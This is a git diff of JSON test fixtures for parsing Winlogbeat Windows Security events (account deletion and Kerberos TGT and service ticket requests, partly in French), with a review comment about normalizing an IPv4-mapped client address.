Management\",\"outcome\":\"success\",\"code\":\"4726\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"kind\":\"event\",\"created\":\"2024-11-12T07:58:14.553Z\"},\"agent\":{\"hostname\":\"hostname\",\"id\":\"12345678-ABCD-ef90-1234-abcdef123456\",\"type\":\"winlogbeat\",\"name\":\"hostname\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"version\":\"7.17.1\"},\"zone\":\"int\",\"site\":\"site\",\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"process\":{\"pid\":632,\"thread\":{\"id\":2056}},\"event_data\":{\"SubjectLogonId\":\"0x3005c1f76\",\"PrivilegeList\":\"-\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"doe.j\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\",\"TargetUserName\":\"smithee.a\",\"TargetDomainName\":\"DOMAIN\"},\"record_id\":25349190364,\"event_id\":\"4726\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"task\":\"User Account Management\",\"computer_name\":\"hostname.domain.net\"},\"ecs\":{\"version\":\"1.12.0\"},\"host\":{\"name\":\"hostname.domain.net\"},\"tags\":[\"windows\",\"domain-controller\",\"beats_input_codec_plain_applied\"]}" + } }, "expected": { "message": "{\"@version\":\"1\",\"log\":{\"level\":\"information\"},\"@timestamp\":\"2024-11-12T07:58:13.288Z\",\"message\":\"A user account was deleted.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tdoe.j\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3005C1F76\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tsmithee.a\\n\\tAccount 
Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t-\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"code\":\"4726\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"kind\":\"event\",\"created\":\"2024-11-12T07:58:14.553Z\"},\"agent\":{\"hostname\":\"hostname\",\"id\":\"12345678-ABCD-ef90-1234-abcdef123456\",\"type\":\"winlogbeat\",\"name\":\"hostname\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"version\":\"7.17.1\"},\"zone\":\"int\",\"site\":\"site\",\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"process\":{\"pid\":632,\"thread\":{\"id\":2056}},\"event_data\":{\"SubjectLogonId\":\"0x3005c1f76\",\"PrivilegeList\":\"-\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"doe.j\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\",\"TargetUserName\":\"smithee.a\",\"TargetDomainName\":\"DOMAIN\"},\"record_id\":25349190364,\"event_id\":\"4726\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"task\":\"User Account Management\",\"computer_name\":\"hostname.domain.net\"},\"ecs\":{\"version\":\"1.12.0\"},\"host\":{\"name\":\"hostname.domain.net\"},\"tags\":[\"windows\",\"domain-controller\",\"beats_input_codec_plain_applied\"]}", diff --git a/Beats/winlogbeat/tests/security_event_4768.json b/Beats/winlogbeat/tests/security_event_4768.json index 53d650df2..c7ac196ea 100644 --- a/Beats/winlogbeat/tests/security_event_4768.json +++ b/Beats/winlogbeat/tests/security_event_4768.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4768\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:12.392Z\",\"action\":\"Service d\u2019authentification Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:10.124Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service 
:\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOSTNAME.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Service d\u2019authentification Kerberos\",\"computer_name\":\"HOSTNAME.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810010\",\"IpPort\":\"51261\",\"TargetDomainName\":\"DOMAIN\",\"TargetUserName\":\"account\",\"TargetSid\":\"S-1-2-3\",\"PreAuthType\":\"2\",\"Status\":\"0x0\",\"ServiceSid\":\"S-1-2-3-4-5\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"service\"},\"process\":{\"thread\":{\"id\":3228},\"pid\":560},\"event_id\":\"4768\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587536},\"@version\":\"1\"}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - 
"message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4768\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:12.392Z\",\"action\":\"Service d\u2019authentification Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:10.124Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le 
r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOSTNAME.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Service d\u2019authentification Kerberos\",\"computer_name\":\"HOSTNAME.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810010\",\"IpPort\":\"51261\",\"TargetDomainName\":\"DOMAIN\",\"TargetUserName\":\"account\",\"TargetSid\":\"S-1-2-3\",\"PreAuthType\":\"2\",\"Status\":\"0x0\",\"ServiceSid\":\"S-1-2-3-4-5\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"service\"},\"process\":{\"thread\":{\"id\":3228},\"pid\":560},\"event_id\":\"4768\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587536},\"@version\":\"1\"}" + } }, "expected": { "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket d\u2019authentification Kerberos (TGT) a 
\u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4768\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:12.392Z\",\"action\":\"Service d\u2019authentification Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:10.124Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket d\u2019authentification Kerberos (TGT) a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount\\n\\tNom du domaine Kerberos fourni :\\tDOMAIN\\n\\tID de l\u2019utilisateur :\\t\\t\\tS-1-2-3\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tservice\\n\\tID du service :\\t\\tS-1-2-3-4-5\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t51261\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket 
:\\t\\t0x40810010\\n\\tCode de r\u00e9sultat :\\t\\t0x0\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tType de pr\u00e9-authentification :\\t2\\n\\nInformations sur le certificat :\\n\\tNom de l\u2019\u00e9metteur du certificat :\\t\\t\\n\\tNum\u00e9ro de s\u00e9rie du certificat :\\t\\n\\t Empreinte num\u00e9rique du certificat :\\t\\t\\n\\nLes informations sur le certificat sont fournies uniquement si un certificat a \u00e9t\u00e9 utilis\u00e9 pour la pr\u00e9-authentification.\\n\\nLes types de pr\u00e9-authentification, les options de ticket, les types de chiffrement et les codes de r\u00e9sultats sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOSTNAME.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Service d\u2019authentification Kerberos\",\"computer_name\":\"HOSTNAME.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810010\",\"IpPort\":\"51261\",\"TargetDomainName\":\"DOMAIN\",\"TargetUserName\":\"account\",\"TargetSid\":\"S-1-2-3\",\"PreAuthType\":\"2\",\"Status\":\"0x0\",\"ServiceSid\":\"S-1-2-3-4-5\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"service\"},\"process\":{\"thread\":{\"id\":3228},\"pid\":560},\"event_id\":\"4768\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587536},\"@version\":\"1\"}", diff --git a/Beats/winlogbeat/tests/security_event_4769.json b/Beats/winlogbeat/tests/security_event_4769.json index 7b1f0f39d..ac4cdd94d 100644 --- a/Beats/winlogbeat/tests/security_event_4769.json +++ b/Beats/winlogbeat/tests/security_event_4769.json 
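Review bot: `winlog.event_data.IpAddress` in this fixture is the IPv4-mapped IPv6 literal `::ffff:1.2.3.4`, which is how a Windows KDC commonly reports an IPv4 client; the parsed fields asserted for this test (e.g. `source.ip`) lie outside the hunk, so I cannot confirm whether the intake normalizes it to `1.2.3.4`. If it is passed through verbatim, detection rules and IP-list matching written for dotted-quad addresses will not fire on TGT requests from that client, and correlation with other Windows events that report the same host as plain IPv4 breaks. It would be worth asserting the normalized form in `expected` and adding a second 4768 fixture with a plain IPv4 `IpAddress` so both shapes are covered. The moved `"message"` line itself is only a key reorder and is semantically a no-op for JSON consumers.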
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. 
L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4769\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:05.023Z\",\"action\":\"Op\u00e9rations de ticket du service Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:02.856Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. 
L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOST01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Op\u00e9rations de ticket du service Kerberos\",\"computer_name\":\"HOST01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810000\",\"LogonGuid\":\"{12345678-ABCD-EF90-1234-123456ABCDEF}\",\"IpPort\":\"50754\",\"TargetDomainName\":\"DOMAIN.PRIV\",\"TargetUserName\":\"account@DOMAIN.PRIV\",\"ServiceSid\":\"S-1-2-3\",\"Status\":\"0x0\",\"TransmittedServices\":\"-\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"SERVICE$\"},\"process\":{\"thread\":{\"id\":7992},\"pid\":560},\"event_id\":\"4769\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587153},\"@version\":\"1\"}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service 
:\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4769\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:05.023Z\",\"action\":\"Op\u00e9rations de ticket du service Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:02.856Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du 
client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOST01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Op\u00e9rations de ticket du service Kerberos\",\"computer_name\":\"HOST01.domain.priv\",\"keywords\":[\"Succ\u00e8s de 
l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810000\",\"LogonGuid\":\"{12345678-ABCD-EF90-1234-123456ABCDEF}\",\"IpPort\":\"50754\",\"TargetDomainName\":\"DOMAIN.PRIV\",\"TargetUserName\":\"account@DOMAIN.PRIV\",\"ServiceSid\":\"S-1-2-3\",\"Status\":\"0x0\",\"TransmittedServices\":\"-\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"SERVICE$\"},\"process\":{\"thread\":{\"id\":7992},\"pid\":560},\"event_id\":\"4769\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587153},\"@version\":\"1\"}" + } }, "expected": { "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture 